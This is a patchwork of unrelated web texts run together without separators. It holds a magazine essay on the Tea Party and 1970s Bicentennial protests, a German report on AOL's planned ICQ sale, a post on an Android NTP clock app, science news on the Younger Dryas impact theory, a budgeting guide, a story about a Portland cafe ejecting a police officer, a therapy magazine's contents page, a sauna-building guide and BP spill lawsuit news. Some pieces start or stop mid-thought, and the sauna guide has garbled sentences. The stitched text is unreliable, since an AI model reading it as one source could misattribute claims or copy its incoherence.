In the seventeen - seventies , parties were anathema ( “ If I could not go to heaven but with a party , ” Jefferson wrote , “ I would not go there at all ” ) , but in the eighteen - thirties parties ran politics .
As Young recounts in “ The Shoemaker and the Tea Party , ” Hewes was brought to Boston for the Fourth of July , 1835 .
The Founding Fathers were dying , but , by parading a ninety - two - year - old man through the streets , the city ’s Whigs claimed the Revolution ’s so - called Tea Party as their own .
Lost was what American independence meant to Hewes , a poor man all his life : before it , he bowed before his betters ; after , he refused to doff his hat to any man .
On the day of the health - care vote , Boston Tea Partiers held a vigil at the Green Dragon “ to watch enemy troop movements on C - SPAN , ” as Hess put it .
When the bill passed , Hess grew more convinced of the aptness of his analogy : “ We sent Scott Brown to Washington to kill this bill , but the people in Washington did everything they could to thwart the will of the people , and especially the people of Massachusetts . ”
In 1774 , in response to the dumping of the tea , Parliament passed what colonists called the Intolerable Acts , which closed the port of Boston and restricted Massachusetts town meetings .
Thomas Gage , the commander of the British forces in America , was named governor .
It was just like health care , Hess said .
“ I really feel like this is a modern - day Intolerable Act . ”
Today ’s Tea Partiers say that they ’re concerned , for the most part , with taxes .
So was the left - wing Peoples Bicentennial Commission , which , in 1974 , called on Americans to form a new TEA Party ( the acronym standing for Tax Equity for Americans ) ; it urged organizers to use the slogan “ Do n’t Tread on Me , ” and suggested “ How about forums on Tax Day , or on the anniversary of the Boston Tea Party — in front of IRS or H. & R. Block ? ”
The Peoples Bicentennial Commission also published a manifesto called “ Common Sense II : The Case Against Corporate Tyranny . ”
It was left , not right , but , aside from that , it has a lot in common with a book published last year , “ Glenn Beck ’s Common Sense : The Case Against an Out - of - Control Government . ”
Thomas Paine , Beck said on his show in February , was the Glenn Beck of the American Revolution .
Paine is n’t rolling over in his grave , though .
Ten years after he was buried , his bones were dug up and they ’ve since been lost .
All things considered , that might be for the best .
“ No , damn it , we keep Tuffy . ” Facebook
Twitter
Email
Shopping
By April 8th , when the Boston Tea Party held its regular monthly meeting at the Green Dragon , word about Palin ’s visit had got around .
Two buses from the Maine Tea Party were already confirmed .
Twenty thousand people might turn up , maybe forty thousand , and who knew how many would be counter - protesters ?
I sat down at a table with George Egan , a soft - spoken Boston cop , retired and living on a pension .
He had been a Democrat until “ Kennedy killed that little girl , ” and had never worked on a political campaign until Scott Brown ’s , but then he threw himself into it , because “ the government is out of control . ”
Egan ’s twin brothers , John and Joe , were there , too .
Their grandparents came over from Ireland in 1907 ; they grew up in Dorchester .
They have worked very hard , all their lives .
They ’re mad about the bums — the bums on the streets , the bums in Washington .
George said , “ Every drug addict gets a check .
We write those checks . ”
Joe said , “ Stay out of our wallets .
I do n’t care : Democrat , Republican ?
I do n’t care . ”
Then George told me , “ My little girl , when she was three , she got real sick .
Had to be in intensive care for ten days .
Had to have a tracheotomy .
I had shit for insurance .
The hospital sent me a bill .
Ten thousand dollars .
I got a second job ; I sent the hospital one hundred bucks a week .
That was the right thing to do .
This is wrong .
People want something , they have to work for it . ”
Hess stopped by .
He was wearing his “ Do n’t Tread on Me ” T - shirt .
The house where I grew up was a lot like the Egans ’ , but Hess figured me for a foreigner .
“ Jane Goodall , meet the man who ’s going to beat Barney Frank , ” he said , introducing me to Sean Bielat , who is running for Frank ’s seat in the fall elections .
I started scribbling notes on Bielat ’s campaign brochure .
“ She ’s going to make a contribution to your campaign , ” Joe Egan joked .
“ Really ? ” Bielat asked , lighting up .
“ No , of course not , ” George said .
“ She ’s from the People ’s Republic of Cambridge . ” Patrick Humphries , a software engineer who was born in Indiana and grew up in Iowa , was handing out pocket - size copies of the Constitution , printed by the National Center for Constitutional Studies , which was started in Utah in 1971 , to promote originalism , the idea that the original meaning of the framers is knowable and fixed and the final word .
“ I do n’t think the Founding Fathers wanted lobbyists running around Washington , ” Humphries said .
Originalism in the courts is certainly a matter for debate .
Jurisprudence stands on precedent , on the stability of the laws .
But originalism has long since reached beyond the courts .
Set loose in the culture , it looks like history but it ’s not .
It is to history what astrology is to astronomy , what alchemy is to chemistry , what creationism is to evolution .
The history that Tea Partiers want to go back to is as much a fiction as the Lost Cause of the Confederacy .
Humphries quoted the Tenth Amendment : “ The powers not delegated to the United States by the Constitution , nor prohibited by it to the States , are reserved to the States respectively , or to the people . ”
He wants those powers .
He feels disenfranchised .
He did n’t vote for Obama ; he does n’t like what he ’s doing .
To Tea Partiers , Obama ’s Administration , his very Presidency , is unconstitutional .
Massachusetts is a foreign country .
The present is a foreign country .
The rise of this sort of thinking has gone , to some degree , unchallenged , just as , in the nineteen - seventies , historians mocked the Bicentennial as schlock and its protests as contrived , but did n’t offer an answer , a story , to a country that needed one .
The American historical profession defines itself by its dedication to the proposition that looking to the past to explain the present falls outside the realm of serious historical study .
That stuff is for amateurs and cranks .
Hofstadter disagreed .
He recognized the perils of presentism — seeing the past as nothing more than a prologue to the present introduces evidentiary and analytical distortions and risks reducing humanistic inquiry to shabby self - justification — but he believed that scholars with something to say about the relationship between the past and the present had an obligation to say it , as carefully as possible , by writing with method , perspective , and authority .
Hofstadter died in 1970 .
He was one of the last university professors of American history to reach readers outside the academy with sweeping interpretations of his own time .
The Bicentennial — a carnival of presentism — helped make the position that Hofstadter once occupied impossible .
That left a great deal of room for a lot of other people to get into the history business .
Today ’s reactionary history of early America , reductive , unitary , and , finally , dangerously anti-pluralist , ignores slavery and compresses a quarter century of political contest into “ the founding , ” as if the ideas contained in Thomas Paine ’s “ Common Sense , ” severing the bonds of empire , were no different from those in the Constitution , establishing a strong central government .
“ Who ’s your favorite Founder ? ” Beck asked Palin in January .
“ Um , you know , well , ” she said .
“ All of them . ”
Boston Common was lined with venders on the day that the Tea Party Express drove into town , on April 14th .
The gimcrackery : “ Fox News Fan ” T - shirts ; “ Tea Party Tea ” ; “ Do n’t Tread on Me ” flags ; “ Straight Pride ” signs ; a tote bag picturing a revolver and the caption “ An Armed Society Is a Polite Society ” ; and , at a special day - of - the - rally discount , copies of “ The Constitution Made Easy . ”
Varley ’s Coalition for Marriage staffed a table .
George and John Egan and Patrick Humphries were passing out Boston Tea Party information .
“ Look , a Black Tea Partier , ” read the sign that Kat Malone carried .
As a crowd gathered around the bandstand , a man in a hard hat cried out , “ The liberals are coming !
The liberals are coming ! ”
On the night of April 18 , 1775 , the patriots who met at the Green Dragon discovered that General Gage planned to march troops to Lexington and Concord , where the colonists were stockpiling weapons , and Revere began his famous ride .
Two hundred years later , on April 18 , 1975 , Gerald Ford came to Boston .
Nixon had resigned in August ; Ford pardoned him in September .
In a speech at the Old North Church , Ford called on Americans to learn , by examining their history , that the American experience “ has been more of reason than revolution . ”
In Concord , thirty thousand protesters were camping out , while Pete Seeger and Arlo Guthrie played through the night .
Rifkin said , “ The theme of the demonstration is ‘ Send a Message to Wall Street , ’ and we want the corporations to know , by our mass presence at Concord , that people are fed up with them running the country . ”
Meanwhile , the evacuation of Saigon was beginning .
Just before ten o’clock on the morning of April 19 , 1975 , Ford arrived in Concord , by helicopter .
In the two centuries since the shot heard round the world , the President said , “ the United States has become a world power . ”
He boasted of American military might , decried isolationism , and argued for change , quoting Jefferson : “ Nothing then is unchangeable but the inherent and inalienable rights of man . ”
He said he hoped that , at the Tricentennial , people would look back at this day and see it as the first in a century of American unity .
After Ford flew away and the protesters went home , a Globe reporter wrote , all that was left was trash , and a sign that read “ The Revolution Is Not Over . ”
Saigon fell eleven days later .
Boston ’s Bicentennial , seized , at first , by antiwar activists , began its turn rightward when opponents of busing took up the mantle of the Revolution .
A federal judge had mandated the integration of Boston ’s schools in 1974 and , as J. Anthony Lukas wrote in “ Common Ground , ” anti-busing activists turned up at Bicentennial events in force , and in Colonial garb , to argue that the court ’s ruling was the equivalent of taxation without representation .
“ We ’re right back where we began 200 years ago , ” read an anti-busing banner displayed during the reënactment of the Battle of Bunker Hill , on June 17 , 1975 .
Ray Flynn , who was then a member of the state legislature , warned , “ The sacred principles on which this nation was founded are threatened by a new tyranny , a tyranny dressed in judicial robes . ”
At a reënactment of the Boston Massacre , four hundred anti-busing protesters paraded with a coffin marked “ R.I.P . Liberty , Born 1770 — Died 1974 . ”
But what most people remember from the coincidence of Boston ’s anti-busing riots and its bid for national attention during the Bicentennial is a single picture , taken on April 5 , 1976 , at City Hall Plaza , just across from Faneuil Hall , and printed on the front page of newspapers across the country : a Pulitzer Prize - winning photograph of a white teen - ager attempting to impale a black man with the American flag .
While everyone waited for Palin on the Common , the Tea Party Express put on a musical show : “ The Stars and Stripes Forever , ” “ The Star - Spangled Banner , ” “ America the Beautiful , ” “ The Battle Hymn of the Republic . ”
Someone on the stage cried out , “ I heard there ai n’t no party like a Boston Tea Party ! ” John Philip Sousa IV gave a speech : “ Mr. Obama , we want the Southern border shut down so tight a rattlesnake could n’t get through it . ”
The crowd , five thousand at its peak , chanted , “ U.S.A .!
U.S.A.! U.S.A. ! ” Varley was given a few minutes on the stage , but not until the end , by which time the bulk of the crowd had left .
Hess spent much of his time working hard to make sure clusters of protesters and counter - protesters did n’t break out into fisticuffs .
“ Moonbats Go Back to Harvard , ” one sign read .
( Howie Carr , a columnist for the Boston Herald , regularly calls liberals moonbats . )
Next to a man from Beacon Hill carrying a sign , “ Our Tea Party is NOT Yours , ” a Tea Partier waved a warning : “ Moonbat — > . ”
On the stage , the national talk - radio host Mark Williams took the microphone : “ I am here to reclaim my home town for America .
The hippies have had it long enough . ”
He denounced the “ lamestream media , ” and Communists in Cambridge and in the White House .
“ Political correctness led to 9/11 .
Political correctness led to Barack Hussein Obama . ”
As the flags waved , Debbie Lee , whose son was the first Navy SEAL to die in Iraq , told the story of his death .
Our troops are fighting this war abroad , she said , and we are fighting it here on the home front .
Standing where Vietnam Veterans Against the War , dressed in battle fatigues and carrying babies in backpacks , once listened to Eugene McCarthy tell them they were bearing witness to life , and peace , the Tea Partiers heard taps , grew hushed , and found redemption , in death and war .
Palin ’s warmup took the stage .
“ I am not an African - American , ” he shouted .
“ I am Lloyd Marcus , an American . ”
He sang .
Then he broke out into revival - style call - and - response .
“ Are y’all racists ? ” he shouted out to the crowd .
“ No ! ” Absolution .
The former governor of Alaska arrived .
“ I love Boston , ” she said .
It was “ the town that the Sons of Liberty called home . ”
When I got on board that ship in Gloucester , I remembered that I had been on the Beaver before .
In an attic somewhere , there must be a picture of me on a third - grade field trip , a red - white - and - blue Bicentennial feather in my Red Sox cap , standing on a crate marked “ TEA . ”
There is no tea here anymore .
Scattered from aft to stern are the remnants of work , interrupted : C - clamps , eyebolts , sheaves of plywood , a rumpled canvas , and a can of WD - 40 , missing its cap .
A coil of rope occupies a bench .
In the bottom of the hull , bilgewater sloshes past a pile of rusty pulleys .
Down below , the ship ’s rudder is bound with rope , held fast against the ocean ’s everyday sway and the magnificent violence of each passing storm . ♦
They 've gone too far at this point , if Hanners ever realizes the innuendo she 's been tossing around her head is likely to explode .
My friend Carly is doing an absolutely excellent auction to benefit the Gulf !
You should check it out !
See you tomorrow .
Ein Verkauf des Instant - Messaging - Dienstes ICQ würde nach Meinung von US - Ermittlungsbehörden die Strafverfolgung im Internet erschweren .
Das berichtet die Financial Times unter Berufung auf US - Ermittler .
Der Internet - Dienstleister AOL plant den Verkauf von ICQ an das russische Unternehmen Digital Sky Technologies ( DST ) , das auch an Facebook beteiligt ist .
Mit dem Verkauf und der wahrscheinlichen Verlagerung der ICQ - Server nach Russland entzögen sich die Server dem Zugriff der US - Ermittler .
Da ICQ aber gerade bei Internet - Kriminellen eines der bevorzugten Kommunikationsmittel sei , verlöre man ein wichtiges Untersuchungsmittel .
" Jeder bekannte Kriminelle ( dieser Welt ) ist auf ICQ " , zitiert die Financial Times einen Ermittler .
Bislang stehen die ICQ - Server noch in der israelischen Zentrale , wo die US - Ermittler in manchen Fällen Zugriff auf Chat - Skripte Verdächtiger gehabt haben sollen .
ICQ ist ursprünglich eine Entwicklung des israelischen Unternehmens Mirabilis .
Insbesondere in Russland ist der Dienst sehr beliebt : Von den 42 Millionen Nutzern sollen allein rund 19 Millionen in Russland zu finden sein .
Die Einwände der US - Ermittler sollen auch dem Committee on Foreign Investment in the US ( CFIUS ) vorliegen , das Empfehlungen gegen Verkäufe von US - Firmen an ausländische Unternehmen aussprechen kann .
Derzeit sieht es laut Bericht jedoch nicht so aus , als würde das Komitee den Verkauf stoppen wollen .
Siehe dazu auch :
( dab )
ClockSync – Synchronise Device Time via NTP
We may earn a commission for purchases made using our links .
Does your Android device suffer clock lag or lead ?
Does your network operator not support time synchronisation via Network Identity and Time Zone ?
If so , then why not try out XDA forum member CrazyCoder ‘s ClockSync app ?
ClockSync synchronises your Android device time with the Atomic time using the Network Time Protocol ( which is designed to synchronise computer clocks over a network ) over your data or Wi-Fi connection .
The app can synchronise your device time automatically or manually .
Originally posted by CrazyCoder :
Displays atomic reference time , system time , clock offset and current date or last synchronisation time
Gets atomic time from the user specified NTP server
Update offset by tapping on the Atomic time or Local offset values on the screen
Tapping on the system time will synchronise the device clock with the Atomic clock
Update / synchronise actions are also available from the application menu
Automatic synchronisation on user specified interval ( battery efficient ! )
Options to synchronise only via Wi-Fi or when device is already awake
Optional haptic feedback when tapping on the active screen elements
am / pm and 24 - hour time display based on the system setting
Compatible with Android 1.5 and higher version including FroYo ( 2.2 )
ClockSync is available for free in the Market , or for information on where to download the apk directly , visit the application thread .
Tiny balls of fungus and feces may disprove the theory that a huge space rock exploded over North America about 12,900 years ago , triggering a thousand - year cold snap , according to a new study .
The ancient temperature drop , called the Younger Dryas , has been well documented in the geologic record , including soil and ice core samples .
The cool - down also coincides with the extinction of mammoths and other Ice Age mammals in North America , and it's thought to have spurred our hunter - gatherer ancestors in the Middle East to adopt an agricultural lifestyle .
But the theory that a comet or asteroid explosion is behind the cooling event is wrong , according to study leader Andrew C. Scott , a paleobotanist at Royal Holloway University in London .
For years proponents of the impact theory have cited tiny spherules of carbon found in a layer of charred sediment throughout North America that dates to the Younger Dryas period .
According to the theory , these spherules are organic matter subjected to intense heat after debris from an exploded meteor rained down on Earth , sparking massive wildfires .
The new research , however , detected carbon spherules in soil layers from before , during , and after the Younger Dryas , making it hard to argue that the particles are products of a sudden impact .
What 's more , Scott 's team found that most of the spherules are similar to tightly packed balls of fungus found in modern soils that have been exposed to low to moderate heat during wildfires .
Plant and soil fungi are known to create these balls of material to help them survive extreme conditions .
Other elongated forms of the spherules match modern fecal pellets from insects .
" All these particles are of natural biological origin and are not related to either intense wildfires or cosmic impacts , " Scott said in an email .
" The press and public are very interested in catastrophic explanations , " he added .
" But it is important that when evidence stacks up to show the theory does not work , then it should be abandoned . "
What About the Nanodiamonds ?
In fact , most experts acknowledge that carbon spherules are found throughout the geological record , including biological forms associated with wildfires , said James Kennett , an emeritus geologist at the University of California , Santa Barbara , who supports the cosmic - impact hypothesis .
However , the spherules are not often found in large quantities , he said , and there is " a peak in carbon spherules at the Younger Dryas boundary . "
What 's more , those spherules are found alongside microscopic diamonds , or nanodiamonds , which often form under the conditions caused by extraterrestrial impacts .
The new study does not report evidence of nanodiamonds , Kennett noted , which is expected , since the team was n't directly looking for them .
" So their [ reported ] data is consistent , " Kennett said .
Study leader Scott said that his team has studied the nanodiamond issue , but he 's not yet able to discuss the results .
He did , however , hint that the particles might not be nanodiamonds at all : Fungal spores the team examined have similar microscopic features .
And , Scott said , " obviously [ spores ] are not nanodiamonds . "
" We took a badge and a gun from a person whose actions proved him unfit for either .
. . .
Ultimately our goal was to get to the truth , " Williams said in a statement .
" Unfortunately , we could only arrive at the truth through his statement given to the police , and that statement cannot be used against him . "
If you have ever listened to Dave Ramsey on TV or the radio , then you have probably heard him refer to a Zero Based Budget .
A zero based budget is a very straight forward budget which works on the premise of assigning each dollar of income a task – or to put it another way , at the end of the month , there should n’t be any money left over in the budget .
That does n’t mean spend it all , it just means assign each dollar a job .
For example , excess funds can go toward savings , paying down debt , investing , etc .
How to Make a Zero Based Budget
A note on steady vs. irregular income .
If you receive a regular and steady income as an employee , creating a zero - based budget should be a relatively easy task .
It ’s much more difficult if your income comes from irregular sources , such as self employment or commissions .
If you receive both a regular paycheck and irregular income , you may want to work on a zero based budget for your regular income only , and use a different method to manage your irregular income .
Step One : Make a list of your monthly income
Using a spreadsheet or a piece of paper , list all sources of monthly income .
Income may come from paychecks , self employed salaries , child support or alimony , etc .
See how to make a cash flow plan for more information .
Step Two :
Make a list of your expenses for the month
For this step , do n’t concern yourself with any bills that are paid semi-annually , annually or anything other than monthly unless the payment is due THIS month .
Just list all of your accounts and amount due for anything you have to pay this month .
Your monthly expense list might include :
rent or mortgage
phone(s )
car payments
cable television
internet
insurance payments
utilities ( electric , water , gas , etc )
credit cards
loans
child care
donations
groceries
entertainment / dining out
Step Three :
Make a list of your non-monthly expenses
Here is where you ’ll record anything that is paid on a schedule other than monthly .
Divide the amount of each account on this list by the number of months between now and the day your bill is due .
If you ’re making your budget in June , and your life insurance is $ 120 and due in September , you ’ll need to budget $ 30 each month to have enough money available when it ’s due .
Once you pay a bill that is paid non-monthly , you ’ll divide the total amount of the bill by 12 months ( if it ’s paid once a year ) to determine how much you need to budget each month so that you ’ll have enough to pay it when it comes due again .
Some typical non-monthly accounts might include :
How do you track irregular expenses ?
An easy way to track your targeted savings is to use a sinking fund or personal accrual account to save up for your semi-regular or irregular expenses .
See How to Open a Sub Account at Capital One 360 for more information about how to easily set up a sinking fund at Capital One 360 .
Step Four :
Make a list of savings goals and debt reduction goals
On this list , include anything that is not a required payment or savings contribution , but something you really want to do ( and can afford to do ) .
This might include :
emergency fund savings
education savings
vacation savings
extra payments to pay off credit cards / loans faster
retirement savings
Step Five : Subtract expenses from income and modify until your budget “ zeros out ”
The goal of the zero - based budget is to create a spending plan where your total income minus all of your monthly expenses will equal zero .
If you do this the first time and end up with a negative number , you need to decrease expenses .
Start by decreasing items that are not essential – like entertainment .
If it ’s still negative , look at your savings goals and debt reduction goals and see if you need to decrease any of these payments temporarily .
If you subtract expenses from income and get a positive number , you ’ll need to increase your “ expenses ” .
Instead of buying something new on credit to give yourself another payment however , you ’ll want to increase your savings goals or debt reduction goals until you get a zero .
Need help with your zero based budget ?
Try You Need a Budget
If you are struggling with making a zero based budget work by using paper and pencil , then try using You Need a Budget ( YNAB ) .
YNAB is a software program specifically designed for building a zero based budget that works .
The program is easy to use will get you moving in the right direction in no time !
One word of advice :
It takes a little practice to get your zero based budget working smoothly .
Expect it to take a couple months to fine tune it .
But once you get it running smoothly , you ’ll be happy knowing where your money is going each month !
The Red & Black Cafe is no place for a man in blue .
Police Officer James Crooker was asked to leave the vegan coffee shop in Portland , Ore. , last month , a discriminatory move but not altogether uncommon at the java joint , a detective told FoxNews.com .
Crooker , 36 , a 2 - year veteran of the force , entered the Red & Black Café on May 18 and bought a cup of coffee before a customer approached him and said she appreciated his efforts .
That 's when John Langley , one of the co-owners of the collectively managed shop , approached the cop and asked him to leave .
Crooker left immediately .
It was the first time something like this has happened to him in his nine - year law enforcement career , he told The Oregonian newspaper .
" The places that I 've been kicked out of before have been places like the methadone clinic , " he said .
" You 're there to protect them , but on the other hand they do n't know what that involves .
Being gracious is part of it . "
Detective Mary Wheat , a spokeswoman for the Portland Police Department , characterized the incident as a " fluke " but noted the city 's ongoing tension between the police and some members of the community .
" This is Portland , " Wheat told FoxNews.com .
" We have been dealing with that for years and years and years .
It 's a very liberal city .
We have anarchists here and we deal with them on a regular basis . "
The coffee shop attracts homeless individuals and activists , the newspaper reported , and Wheat said it is known to be " not friendly " to officers who work the area .
" Most officers would know that this is not a coffee shop that 's friendly to police , " she said .
" It 's obviously discrimination to police .
He works that area and he can't go in for a cup of coffee -- it 's not fair . "
The customer who approached Crooker , Cornelia Seigneur , is a freelancer for The Oregonian who blogged about the incident on her website .
" As I spoke with the café owner , I really never got a direct answer as to why he personally felt unsafe with a police officer in his establishment , " Seigneur wrote .
" Bottom line , I think especially of the policeman I met at the red and black , Officer James Crooker , a human being who should be treated with respect and honor , like all human beings . "
Neither Crooker nor Langley could be reached for comment on Friday .
An employee who answered the phone at the Red and Black café declined to discuss the incident .
" I 've been taking calls about this all day and I 'm kind of tired of talking about it , " the employee said .
" I have a regular job . "
Editor 's Note By Rich Simon September / October 2020
How can therapists of all races and ethnicities support their clients of color in voicing their experiences of racial oppression and naming what they need to heal ?
And how can white therapists in particular use their skills and commitment to self - awareness to look more deeply at themselves and their privilege ?
Read more ...
Bonus - Read the entire article FREE !
Working With Internalized Racism From Shame to Unburdening with IFS By Richard Schwartz September / October 2020
While the Black Lives Matter movement has increased the country ’s understanding of the pernicious impact of racism , how do people actually do the internal work of grappling with the unacknowledged racism within themselves ?
Read more ...
The Agreement Tackling a Teachable Moment on Race By Lauren Dockett September / October 2020
In the days after George Floyd ’s murder , and amidst their work to address gang - related trauma and violence , a white therapist and her Black cofacilitator wrestle with the nuances of privilege and relationship .
Read more ...
Braving the Unknown The Search for New Solutions By Scott Miller , Mark Hubble & Birgit Valla Birgt September / October 2020
We once believed that following in the footsteps of the medical model would ensure the viability of mental health professionals .
But in the face of growing evidence that what we ’re doing is neither working nor sustainable , one innovative clinic decides it ’s time to change course .
Read more ...
Bonus - Read the entire article FREE !
The Therapy Beat Can Therapists Help Parents Raise Antiracist Kids ?
By Marian Sandmaier September / October 2020
If ever there was a moment to talk with children about racism and antiracism , it ’s now .
But how , exactly ?
Read more ...
In Consultation Exploring the Inner Selfie : Digital Zen for Young Clients By Tobi Goldfus September / October 2020
Our teen clients know a lot about connecting with others online , but they still need our wisdom about connecting with their core inner selves .
Read more ...
Case Study Last - Chance Therapy in a Tumultuous Time : Discovering Hope in Higher Values with Couples By Peter Fraenkel September / October 2020
COMMENTARY BY DONNA BAPTISTE
Working with couples on the brink of divorce during this pressure - cooker time requires us to help them “ reach up ” to their highest values .
Read more ...
Point of View 30 Is Not the New 20 By Ryan Howes September / October 2020
Why our 20s are a developmental sweet spot , and what therapists should know about helping clients make the most of them .
Read more ...
Bookmarks Disrupters and Lifequakes : Moving Through the Big Transitions By Diane Cole September / October 2020
A guide to dealing with the traumas and challenges that can redefine who we are and what we want to do in the world .
Read more ...
Family Matters The Wonder of Mom ’s World : Discovering Egypt over a Cup of Tea By Kathleen Monahan September / October 2020
The ordinary moments of life reveal the true wonders of a mother –daughter relationship .
Read more ...
Practice Tools - September / October 2020 Issue Nine Relaxation Scripts for Anxiety & Depression By September / October 2020
Your FREE practice tools download to use with clients right away .
Read more ...
Bonus - Read the entire article FREE !
Whenever it comes to constructing any structure , it is good to ensure that all the materials are prepared and well budgeted for .
Finns for a long time have been using saunas as a place to relax and detox their bodies .
They are recognized for their artistic work when it comes to constructing saunas .
Their humble but enjoyable lifestyle has seen this Northwest culture spread even beyond the Oregonians .
What makes a sauna is a shed that has been insulated with your preferred method of wood that you prefer and of course , a heat source .
The heat source should be preferably a wooden heater .
In the effort of trying to construct , we should ensure that the construction does not bring adverse effects to the ecosystem .
Step 1 : Preplanning .
The construction of the sauna is entirely committing and requires a lot of planning .
The building needs you to make estimates of the budget first things first .
There is a need to ensure all legal procedures are followed if it calls for that .
You might want to acquire a license from the associated with licensing of construction .
You might also need to ensure that you have a set of professionals to help you in better plañning and taking down measurements .
If there are materials that need to be there on - site before the process begins , should have been cleared off from paperwork .
It is advisable not to start even acquiring your tools ready without first ensuring that paperwork is off your desk .
To ensure that you always have a good sauna at the very end , you have to start at the very beginning .
This can only be achieved by developing a proper plan .
Step 2 : Preparation of getting the required tools .
Surprisingly , the construction of a sauna has proved to be the most straightforward task ever .
What a sauna entails is a shed that has been well insulated with a burning heat source .
The heat source could vary according to one ’s preference ; some opt to go for gas , electricity , or even wood .
A standard sauna structure will take averagely twenty - four hours to complete .
A customized design would take two days , three at most .
A budget of two thousand dollars would be the cost of the typical simple design , while a customized one could range up to seven thousand dollars .
DYI saunas , on the other hand , are always ranged from three thousand five hundred dollars to about six thousand five hundred dollars .
Factors such as location should be considered because it contributes majorly to ensuring that you have a solid structure .
That sauna located in a secluded area in an open ground sounds the like best option considering that you want a well - ventilated sauna that overlooks good natural scenery to bring about tranquility .
Before constructing , ensure that your sauna is first of all eco-friendly and cost - .
For an environment - friendly sauna , local cedar is the most preferred material for roofing purposes .
You can get recycled cedar shingles for that work .
Using electricity does not sound , so like being cost - as it consumes a lot of power to heat the electric heaters .
For a simple start , wood can be used as a source of heat .
They are also so beneficial for skin cleansing .
The Aprovecho Research Center , a well - known brand , also recommends the use of wood - eco stoves .
It is at this juncture that you have the professional team if there is the need to have one ready .
The task is , however , easy , and with the help of a friend , you can always get it done .
Fittings and wiring is the only point where you might want the help of a professional team .
Step 3 : The Actual Process of Constructing .
After ensuring that you have all the materials placed ready for construction , you can start the work of setting up the structure .
The first step is usually to put down a concrete slab , which is supposed to be three inches thick .
To frame the walls of the sauna and the roof , you can use your recycled two by four cedar lumber to do that .
For a better look , ensure that the ceiling does not exceed a height of seven feet .
Make sure in your roofing that there is also at least three the top and by the bottom of the floor levels .
You can decide to increase the number of air ventilates depending on the structure of the sauna .
A bigger sauna will call for more ventilation spaces .
A standard door that measures two feet by six feet would make an ideal doorway .
Since most outdoor saunas cost in the $ 2000 to $ 5000 range , so if money is not your first concern , but for better privacy , hygiene , and adjustability , I ’d recommend you get outdoor sauna a try .
The need to construct upper and lower benches that measure between eighteen and twenty - four inches deep .
Installations differ when it comes to insulation .
The roof will require R22 to R26 insulations , and the walls will call for R13 insulations .
After working on the insulations , you can staple it over using a sauna aluminum foil to act as a vapor barrier .
The inside can be artistically designed using Oregon cedar .
If this particular type is not readily available , the Western cedar can be used to dress the interior .
The reason why the cedar is preferred is that the wood brings an excellent aroma when exposed to heat from the sauna and does not wear out comfortably .
Even better cedar can withstand heat from the wooden eco stoves when comparing it to other words .
Step 4 : Ensuring safety measures have been placed .
It is so essential to ensure that the nail heads are covered to ensure that they do not conduct heat .
Safety should be prioritized , and this should be considered when connecting the place with power .
This can only be achieved by ensuring that you have hired a licensed electrician to perform the task of wiring .
If there is a need to get a permit for construction , make sure you acquire one from the respective authorities .
The biggest mistake that you should always avoid when it comes to the development of a sauna I that people take safety so lightly and result in disasters of fire outbreaks .
The construction process should also be done with correct avoid accidents .
Conservationists Hit BP With $ 19 Billion Clean Water Act Lawsuit
The Center is seeking the maximum possible penalty against BP for the spill that began April 20 when the oil rig Deepwater Horizon , owned by Transocean and leased by BP , exploded and caught fire off the coast of Louisiana about 50 miles southeast of the Mississippi Delta , killing 11 men .
The rig burned for 36 hours before it sank , leaving the damaged wellhead spilling oil and gas into the water at the latest flow rate estimate of 35,000 to 60,000 barrels per day , released last week by the National Incident Command 's Flow Rate Task Force .
While , BP is now containing approximately 28,000 barrels of oil per day , the remainder continues to gush into the gulf .
" It is undisputed that responsibility for the oil spill rests primarily on BP and that efforts to stop the leak have failed .
The oil and toxic pollutants flowing into the Gulf of Mexico are a plain violation of the Clean Water Act , " the Center claims in its complaint , which states that BP does not have a permit to discharge the oil .
Investigations to determine the causes of the incident are ongoing in Congress and at several federal agencies .
In addition , President Barack Obama has established a Presidential Commission to get to the bottom of the situation .
If BP 's violations are found to have been the result of gross negligence or willful misconduct , the maximum fine is $ 4,300 per barrel spilled .
At this rate , the company is already liable for approximately $ 11 billion in Clean Water Act penalties .
At the direction of the Unified Command , BP contractors burn off surface oil from the spill to keep it from reaching shore , sending clouds of pollution into the atmosphere .
June 13 , 2010 .
( Photo courtesy U.S. Coast Guard )
If the spill continues through August 1 , 2010 , BP 's liability will be approximately $ 19 billion .
The penalties will be paid to the U.S. Treasury and will be available for Gulf coast restoration efforts .
Under an agreement between BP officials and President Obama reached last week , the company has set aside $ 20 billion in an independently administered escrow fund to cover spill - related claims .
Accompanied by Mississippi Governor Haley Barbour , fund administrator , attorney Kenneth Feinberg told a news conference in Jackson on Friday , " The goal is to help the people of Mississippi and the Gulf and I intend to do that and to be prompt . "
" I would hope we will pay claims within 30 to 60 days , " Feinberg said .
The Center 's lawsuit seeks a full accounting from BP of how much oil is gushing into the Gulf of Mexico each day and what pollutants are mixed in with the oil .
" The government has yet to take any criminal or civil actions against BP , " said Kieran Suckling , executive director of the Center for Biological Diversity .
" We filed this suit to ensure BP is held accountable for every drop of oil and pollution it has released into the Gulf of Mexico , " he said .
" We can't bring back dead sea turtles , dolphins and whales , but we can ensure BP is penalized to the full extent of the law for causing the worst environmental disaster in American history . "
In addition to the oil , " alleged Sucking , " the spill is also leaking hazardous chemicals including benzene , arsenic and naphthalene . "
" Gulf residents , cleanup crews , wildlife officials and the American public have a right to know to the magnitude and danger of this spill , " said Suckling .
" The company has n't been forthright even in the face of public outrage .
A judge 's order will change all that .
Until then , we 're flying blind when it comes to protecting human health and the environment . "
The Center has taken other legal actions in connection with the BP oil disaster .
On May 27 , the Center filed a lawsuit against Interior Secretary Ken Salazar and the Minerals Management Service to strike down the agency 's exemption of 49 Gulf of Mexico drilling projects from all environmental review .
That suit was filed in the Fifth Circuit Court of Appeals in New Orleans .
On June 3 , the Center filed an official notice of its intent to sue the Environmental Protection Agency for authorizing the use of toxic dispersants without ensuring that these chemicals would not harm endangered species and their habitats .
The letter of notice requests that the agency , along with the U.S. Coast Guard , immediately study the effects of dispersants on species such as sea turtles , sperm whales , piping plovers , and corals and incorporate this knowledge into oil - spill response efforts .
A federal judge has ruled that there is no reason to delay an oil spill lawsuit against BP Plc while the U.S. Judicial Panel on Multidistrict Litigation decides whether or not to consolidate the more than 130 lawsuits arising from the Deepwater Horizon rig explosion .
On May 27 Chief Judge William Steele of the U.S. District Court for the Southern District of Alabama denied BP 's motion to stay the litigation Tuesday , ruling that preliminary motions might proceed .
BP says it has now spent roughly $ 2 billion since April 20 trying to stop the oil spill and to pay initial claims for damages .
The spill has now fouled shores in four states - Louisiana , Alabama , Mississippi and Florida .
